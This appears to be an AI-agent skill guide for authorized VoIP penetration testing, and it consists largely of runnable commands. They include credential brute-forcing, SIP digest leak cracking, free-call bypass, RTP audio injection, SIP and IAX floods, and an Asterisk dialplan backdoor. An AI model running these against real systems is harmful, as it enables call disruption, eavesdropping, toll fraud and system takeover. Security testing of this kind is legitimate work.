VoIP Pentesting Skill

A comprehensive skill for conducting VoIP penetration testing assessments, from initial enumeration through exploitation and reporting.

When to Use This Skill

Use this skill when:

• Testing VoIP infrastructure (SIP servers, PBX systems, IP phones)
• Enumerating SIP services and extensions
• Testing for VoIP-specific vulnerabilities (SIPDigestLeak, RTPBleed, misconfigurations)
• Performing password attacks on VoIP systems
• Analyzing captured VoIP traffic
• Testing for free call vulnerabilities
• Assessing Asterisk, FreePBX, Elastix, or similar PBX systems

Prerequisites

Before starting VoIP pentesting:

1. Authorization: Ensure you have written permission to test the target systems
2. Network Access: You need network access to the VoIP infrastructure
3. Tools: Install required tools (see Tool Setup section)
4. Target Information: Have target IP ranges, known extensions, or phone numbers

Tool Setup

Essential Tools

# SIPVicious suite (enumeration and attacks)
sudo apt install sipvicious

# SIPPTS (comprehensive SIP testing)
git clone https://github.com/Pepelux/sippts
cd sippts && make

# SIPCrack (offline password cracking)
sudo apt install sipcrack

# Additional tools
sudo apt install enumiax rtpinsertsound rtpmixsound

Optional Tools

# Wireshark for packet analysis
sudo apt install wireshark

# Metasploit (has SIP modules)
# Already included in Kali

# Multimon for DTMF extraction
sudo apt install multimon

Phase 1: Reconnaissance and Enumeration

1.1 OSINT and Phone Number Discovery

Start by gathering information about the target's phone systems:

# Search for exposed phone numbers
# Use Google Dorks to find exposed VoIP configurations

# Grandstream phones
intitle:"Grandstream Device Configuration" Password

# Cisco CallManager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On"

# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX"

# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"

1.2 Network Service Discovery

Scan for VoIP services on the network:

# Nmap SIP scan (slow but thorough)
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24

# SIPVicious svmap (faster, fingerprinting)
svmap 10.10.0.0/24 -p 5060-5070 --fp

# SIPPTS scan (fastest, multi-threaded)
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco

# Metasploit SIP scanner
use auxiliary/scanner/sip/options
set RHOSTS 10.10.0.0/24
run

1.3 Additional Service Discovery

PBX systems often expose other services:

Port	Service	Purpose
69/UDP	TFTP	Firmware updates
80/443	HTTP/HTTPS	Web management
389	LDAP	User information
3306	MySQL	Database
5038	Manager	Asterisk management
5222	XMPP	Jabber messaging
5432	PostgreSQL	Database

# Scan for additional services
nmap -p 69,80,443,389,3306,5038,5222,5432 10.10.0.10

1.4 SIP Methods Enumeration

Discover which SIP methods are supported:

sippts enumerate -i 10.10.0.10

1.5 Extension Enumeration

Find valid extensions on the PBX:

# SIPVicious svwar
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER

# SIPPTS exten
sippts exten -i 10.10.0.10 -r 5060 -e 100-200

# Metasploit
use auxiliary/scanner/sip/enumerator
set RHOSTS 10.10.0.10
set RPORT 5060
run

# EnumIAX for IAX protocol
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10

Phase 2: Authentication Testing

2.1 Online Password Brute-Force

Test credentials against discovered extensions:

# SIPVicious svcrack
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080

# SIPPTS rcrack (multiple users)
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt

2.2 Offline Password Cracking

If you've captured SIP traffic with credentials:

# Extract credentials from pcap
sipdump -p capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt

# Or with SIPPTS
sippts dump -f capture.pcap -o data.txt
sippts dcrack -f data.txt -w wordlist/rockyou.txt

2.3 SIP Digest Leak Exploitation

Exploit the SIPDigestLeak vulnerability:

sippts leak -i 10.10.0.10

# Output can be saved and cracked with:
sippts dcrack -f leak_output.txt -w wordlist/rockyou.txt

Phase 3: Vulnerability Testing

3.1 Free Call Testing

Test for authentication bypass in call handling:

# Test unauthenticated INVITE
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v

# Test call transfer
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444

3.2 RTP Bleed Detection

Test for RTP Bleed vulnerability:

# Detection
sippts rtpbleed -i 10.10.0.10
sippts rtcpbleed -i 10.10.0.10

# Exploitation (if vulnerable)
sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav

3.3 Server Response Analysis

Analyze server behavior with custom requests:

sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp

# WebSocket testing
sippts wssend -i 10.10.0.10 -r 443 -path /ws

Phase 4: Traffic Analysis

4.1 VoIP Sniffing

Capture and analyze VoIP traffic:

# Capture traffic
tcpdump -i eth0 -w voip_capture.pcap port 5060

# Extract SIP data
sippts tshark -f capture.pcap [-filter auth]

# Extract DTMF codes
multimon -a DTMF -t wac pin.wav

4.2 Manager Interface Testing

Test Asterisk Manager interface (port 5038):

# Connect and query
exec 3<>/dev/tcp/10.10.10.10/5038
echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n" >&3
cat <&3

Phase 5: Advanced Attacks

5.1 RTP Injection

Inject audio into active calls:

# Using rtpinsertsound
rtpinsertsound -i 10.10.0.10 -p 10070 -f audio.wav

# Using rtpmixsound
rtpmixsound -i 10.10.0.10 -p 10070 -f audio.wav

5.2 Denial of Service

Test system resilience:

# SIP flood
sippts flood -i 10.10.0.10 -m invite -v

# SIP ping (response time)
sippts ping -i 10.10.0.10

# IAX flood
iaxflood 10.10.0.10

5.3 Remote Code Execution

If you can modify Asterisk configuration:

# Add extension with System command
# In extensions.conf:
# exten => 100,1,System(/tmp/backdoor.sh)

# Reload configuration
# This may require web interface access or file write permissions

Common Vulnerabilities Checklist

• SIPDigestLeak: Test with

  sippts leak

• RTPBleed: Test with

  sippts rtpbleed

• Free Calls: Test with

  sippts invite

• Extension Injection: Test with malformed extension values
• Weak Passwords: Test with

  svcrack

  or

  sippts rcrack

• Manager Interface: Test port 5038 access
• Web Interface: Test for exposed admin panels
• Context Misconfiguration: Test for unrestricted dialing
• IVR Bypass: Test for input validation issues
• Eavesdropping: Test for ChanSpy/ExtenSpy exposure

Reporting

Document your findings with:

1. Vulnerability Summary: List all discovered vulnerabilities
2. Risk Assessment: Rate each finding (Critical/High/Medium/Low)
3. Proof of Concept: Include command outputs and screenshots
4. Remediation: Provide specific recommendations for each finding
5. Evidence: Save PCAP files, logs, and test outputs

Safety and Ethics

⚠️ Important Reminders:

1. Authorization: Only test systems you have explicit permission to test
2. Scope: Stay within the agreed scope of testing
3. Timing: Avoid testing during business hours if it could disrupt operations
4. Data Handling: Securely handle any credentials or sensitive data discovered
5. Documentation: Document all testing activities for audit purposes
6. Legal Compliance: Ensure compliance with applicable laws and regulations

References

• SIPPTS Documentation
• SIPVicious
• RTPBleed
• SIPDigestLeak Tutorial
• RFC 3261 - SIP

Quick Reference

SIP Response Codes

Code	Meaning
100	Trying
180	Ringing
200	OK
401	Unauthorized
403	Forbidden
404	Not Found
408	Request Timeout
486	Busy Here
500	Internal Server Error
603	Decline

Common SIP Methods

Method	Purpose
REGISTER	Register a SIP user
INVITE	Initiate a call
ACK	Confirm receipt
BYE	End a call
OPTIONS	Query capabilities
CANCEL	Cancel pending request
SUBSCRIBE	Subscribe to events
NOTIFY	Send notifications